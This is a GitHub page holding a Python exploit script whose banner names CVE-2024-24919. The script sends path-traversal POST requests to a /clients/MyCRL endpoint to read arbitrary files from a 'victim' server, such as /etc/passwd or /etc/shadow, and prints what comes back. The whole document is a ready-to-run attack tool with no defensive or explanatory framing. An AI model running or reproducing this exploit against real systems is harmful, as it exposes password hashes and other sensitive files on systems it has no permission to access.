-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
95 lines (64 loc) · 3.1 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#!/usr/bin/python3
import time
import requests
import signal, sys
from colorama import Style, Fore, init
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Colors
init(autoreset=True)
yellow = f"{Style.BRIGHT}{Fore.YELLOW}"
green = f"{Style.BRIGHT}{Fore.GREEN}"
red = f"{Style.BRIGHT}{Fore.RED}"
cyan = f"{Style.BRIGHT}{Fore.CYAN}"
blue = f"{Style.BRIGHT}{Fore.BLUE}"
magenta = f"{Style.BRIGHT}{Fore.MAGENTA}"
white = f"{Style.BRIGHT}{Fore.WHITE}"
# Cntrl + C
def def_handler(sig, frame):
print(f"{red}\n\n[!] Leaving...\n")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
# Functions
def check():
main_url = f"{url}/clients/MyCRL"
headers = {'Content-Length': '39'}
post_data = "aCSHELL/../../../../../../../etc/passwd"
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
try:
r = requests.post(main_url, headers=headers, data=post_data, verify=False, allow_redirects=False)
if r.ok:
print(f"\n\n{green}[!] {blue}The victim is vulnerable!")
time.sleep(1)
exploit()
else:
print(f"\n\n{red}[!] The victim is not vulnerable")
except requests.RequestException as e:
print(f"\n\n{red}[!] Error in the request: The page is not vulnerable or not exists\n")
def exploit():
main_url = f"{url}/clients/MyCRL"
headers = {'Content-Length': '39'}
post_data = f"aCSHELL/../../../../../../../{path}"
try:
r = requests.post(main_url, headers=headers, data=post_data, verify=False)
if r.ok:
print(f"""
\n{white}[+] {blue}Showing the information of the [ {yellow}{path} {blue}]
\n{magenta}┌──────────────────────────────━┿──┿━───────────────────────────────┐
\n{cyan}{r.text}
{magenta}└──────────────────────────────━┿──┿━───────────────────────────────┘\n""")
else:
print(f"\n\n{red}[!] The path {path} do not exist")
except requests.RequestException as e:
print(f"\n\n{red}[!] The path {path} do not exist in the vulnerable machine\n")
sys.exit(1)
# Main
if __name__ == '__main__':
print(f"\n\n{magenta} ___ _ _ ____ ___ ___ ___ __ ___ __ ___ __ ___ ")
print(f"{magenta} / __)( \/ )( ___)___(__ \ / _ \(__ \ /. | ___(__ \ /. | / _ \/ )/ _ \\")
print(f"{magenta}( (__ \ / )__)(___)/ _/( (_) )/ _/(_ _)(___)/ _/(_ _)\_ / )( \_ /")
print(f"{magenta} \___) \/ (____) (____)\___/(____) (_) (____) (_) (_/ (__) (_/ \n\n")
url = input(f'\n{yellow}[?] {blue}Enter the main URL (Example: {yellow}https://rugalo.com{blue}) ={yellow} ')
path = input(f'\n\n{yellow}[?] {blue}Enter the path of the file (Example: {yellow}/etc/shadow{blue}) ={yellow} ')
time.sleep(1)
print(f"\n\n{white}[+] {blue}Testing if the victim is vulnerable...")
check()